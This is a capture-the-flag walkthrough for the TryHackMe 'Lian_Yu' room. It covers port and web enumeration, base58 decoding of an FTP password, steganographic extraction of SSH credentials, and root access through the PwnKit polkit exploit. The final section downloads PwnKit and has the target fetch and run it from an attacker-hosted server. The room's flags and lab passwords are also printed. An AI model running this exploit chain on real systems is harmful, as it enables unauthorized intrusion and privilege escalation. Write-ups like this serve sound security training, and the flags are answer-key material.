TryHackMe: Lian_Yu
Walkthrough of the TryHackMe 'Lian_Yu' room — web and service enumeration, FTP & steganography discovery, SSH foothold, and privilege escalation via PwnKit (Polkit CVE-2021-4034).
TryHackMe: Lian_Yu — Writeup | 17 October 2025
Overview
Lian Yu walks through service/web enumeration, hidden files discovery, FTP access, steganography to reveal secrets, SSH access, and local privilege escalation using a known Polkit exploit (PwnKit).
Reconnaissance & Scanning
Nmap
Full port and service scan:
sudo nmap -Pn -T4 -n -sC -p- -oN scan_lian.txt 10.201.37.223
Scan summary (selection):
21/tcp open ftp
22/tcp open ssh
80/tcp open http (Title: Purgatory)
111/tcp open rpcbind
57960/tcp open status
Web Enumeration
Run Gobuster to locate hidden directories:
gobuster dir -u http://10.201.37.223/ -w /usr/share/wordlists/rockyou.txt -o dir_results.txt -t 25
Gobuster results:
/island (301) -> /island/
/server-status (403)
Fuzz the island path (4-digit wordlist used):
ffuf -w /usr/share/seclists/Fuzzing/4-digits-0000-9999.txt -u http://10.201.37.223/island/FUZZ
Result: found directory 2100
Answer: 2100
Scan directory in 2100
Scan the directory for files (searching for .ticket):
gobuster dir -u http://10.201.0.179/island/2100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .ticket
Found file: green_arrow.ticket
Answer: green_arrow.ticket
Inside green_arrow.ticket an encoded string was observed:
RTy8yhBQdscX
After decoding it as base58, the FTP password was recovered:
FTP password: !#th3h00d
Answer: !#th3h00d
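As an added example (not part of the original writeup), a from-scratch base58 decoder and encoder, applied to the ticket string; it shows why "decoding" works here where a hash could not be reversed, and covers the leading-'1' edge case that quick one-liners usually miss.

```python
# Added example: decode the base58 string found in green_arrow.ticket.
# Base58 (Bitcoin alphabet) omits 0, O, I and l to avoid visual confusion.
ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
INDEX = {c: i for i, c in enumerate(ALPHABET)}


def b58decode(s: str) -> bytes:
    """Decode a base58 string into bytes (big-endian; each leading '1' is 0x00)."""
    n = 0
    for ch in s:
        if ch not in INDEX:
            raise ValueError(f"invalid base58 character: {ch!r}")
        n = n * 58 + INDEX[ch]
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    # Leading '1' characters carry no numeric value; restore them as zero bytes.
    pad = len(s) - len(s.lstrip("1"))
    return b"\x00" * pad + body


def b58encode(data: bytes) -> str:
    """Inverse of b58decode; used here to confirm the round trip."""
    n = int.from_bytes(data, "big")
    out = ""
    while n:
        n, r = divmod(n, 58)
        out = ALPHABET[r] + out
    pad = len(data) - len(data.lstrip(b"\x00"))
    return "1" * pad + out


def recover_ftp_password(ticket_string: str) -> str:
    """Decode the ticket value and return it as printable text."""
    return b58decode(ticket_string).decode("ascii")


if __name__ == "__main__":
    TICKET = "RTy8yhBQdscX"  # value taken from green_arrow.ticket
    pw = recover_ftp_password(TICKET)
    print(pw)  # !#th3h00d
    assert b58encode(pw.encode()) == TICKET
```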
FTP & Steganography
Connect to FTP with the recovered password. In user vigilante’s home there are image files:
- Leave_me_alone.png
- Queen’s_Gambit.png
- aa.jpg
Repair PNG header and check:
printf '\x89\x50\x4e\x47\x0d\x0a\x1a\x0a' | dd of=Leave_me_alone.png bs=8 conv=notrunc
pngfix -q --outfile Leave_me_alone.png Leave_me_alone.png
pngcheck -vv Leave_me_alone.png
Opening the repaired image reveals the passphrase: password
Use steghide to extract hidden data from aa.jpg:
steghide extract -sf aa.jpg # passphrase: password
This extracts ss.zip. Unzip:
unzip ss.zip
Archive contains:
- passwd.txt
- shado
From shado the SSH password was recovered:
SSH password: M3tahuman
Answer (SSH password): M3tahuman
SSH Foothold
SSH in as slade (the username is hinted in passwd.txt; adjust the IP to your instance):
ssh slade@10.201.97.206
After login, retrieve user flag:
User flag:
THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0N'T}
Privilege Escalation to root
Check sudo privileges:
sudo -l
Output shows:
(root) PASSWD: /usr/bin/pkexec
pkexec here is the setuid polkit binary affected by CVE-2021-4034, so the public PwnKit exploit can be used to obtain root; the vendor polkit update that fixes this CVE closes the path.
On attacker machine:
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
python3 -m http.server 8000
On target (adjust attacker IP):
wget http://10.XX.XX.XX:8000/PwnKit
chmod +x PwnKit
./PwnKit
Verify root:
whoami
# root
Root flag:
THM{MY_W0RD_I5_MY_B0ND_IF_I_ACC3PT_YOUR_CONTRACT_THEN_IT_WILL_BE_COMPL3TED_OR_I'LL_BE_D34D}
Flags
- User: THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0N'T}
- Root: THM{MY_W0RD_I5_MY_B0ND_IF_I_ACC3PT_YOUR_CONTRACT_THEN_IT_WILL_BE_COMPL3TED_OR_I'LL_BE_D34D}
Notes:
- Keep attacker IPs and exact paths adjusted to your environment.
- Use these commands responsibly and only in authorized labs.